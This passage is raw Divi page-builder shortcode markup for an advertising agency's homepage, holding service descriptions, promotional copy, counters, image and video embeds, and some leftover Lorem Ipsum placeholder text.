header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/Screenshot-2020-07-19-at-2.05.17-AM.png\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.1\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/63368-2.png\" alt=\"Why We\" title_text=\"Best Agency to choose\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.1\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales 